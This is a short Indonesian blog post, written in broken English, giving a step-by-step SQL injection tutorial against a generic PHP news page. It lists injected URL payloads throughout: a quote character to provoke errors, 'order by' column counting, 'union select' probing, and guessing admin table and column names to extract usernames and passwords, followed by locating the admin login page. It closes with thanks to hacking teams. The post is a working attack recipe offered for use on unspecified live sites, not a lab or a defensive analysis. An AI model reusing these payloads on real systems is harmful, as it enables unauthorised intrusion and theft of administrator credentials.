Breaking News

Simple Blind SQL Injection Method


Simple Blind SQL Injection Methode V4 Tutorial

Langkah Pertama:



Find the target

ex: /news.php?pid=1


Add character ‘ at end of url to find error message.

ex: /news.php?pid=1′ atau


===========

=step two=

===========


find and count to amount the table in database.

use the command : order by



es: [site]/news.php?pid=-1+order+by+1–


chek step by step…

misal: /news.php?pid=-1+order+by+1–

/news.php?pid=-1+order+by+2–

/news.php?pid=-1+order+by+3–

/news.php?pid=-1+order+by+4–


so it appears error message or missing error…

ex: /news.php?pid=-1+order+by+5–


so that we take is up to number 4


ex: /news.php?pid=-1+order+by+4–


============

=step three=

============


for show the numbers that appear use the union

coz it error until 5

do this: /news.php?pid=-1+union+select+1,2,3,4–


=============

=step four:=


=============


find the tabble

you can use your logic

example the table is

admin, admins, login, logins, user, users


use command +from+(table_name)–


ok do this

ex : /news.php?pid=-1+union+select+1,2,3,4+from+admin–

if not have error



and you can see the number is appear for example 2

go to the next step


============

=step five=

============


find the username & peassword coloumn

for username

use ur logic again


example:

user, usr, username, user_name, login, user_admin, name, admin_user, and etc


last number 2 is appear

do this

ex : /news.php?pid=-1+union+select+1,username,3,4+from+admin–


example appear : admin

admin is username


for password

use ur logic again


example:

password, pswd, passwd, pass, pwd, kunci, masuk, sandi, and etc


ex : /news.php?pid=-1+union+select+1,password,3,4+from+admin–


example appear : 123456

123456 is password


===============

=step six:=

===============


ok in the last step you must find admin page



ex : website.com/admin


sorry bhs inggris hehehehe..


=====================

: Special thx to :

Allah SWT


: My teacher :

vyc0d, Gonzhack

=====================

: thx to :


MR.FRIBO, DHIYAT, BOBYHIKARU, N4CK0, RAJEZ, AZZURE,SICK_HACKER, mas UTUH

AA EZHA, crusdd2, DIMAZ,DUDULS, slalu_ngantuk,ku51_g0y4n9 & BEJAMZ

: thx for the team :

N.G.U TEAM, CYBERDOS TEAM, HACKER NEWBIE TEAM, XPGROUND TEAM, DEVILZC0DE, TECON CREW, IDC

=====================
Enter your email address to get update from Blog Asal Palembang.

Enter your email address:

Delivered by FeedBurner

Label:

Tidak ada komentar:

Posting Komentar

Ketentuan berkomentar ;
* Dilarang berkomentar promosi
* Dilarang menautkan link aktif di kalimat komentar
* Dilarang berkomentar yang anda tidak suka jika hal itu terjadi di blog anda sendiri
Komentar yang melanggar akan terblokir secara otomatis
! Terkadang komentar akan dimoderasi karena banyaknya spam

Langganan: Posting Komentar (Atom)
Designed By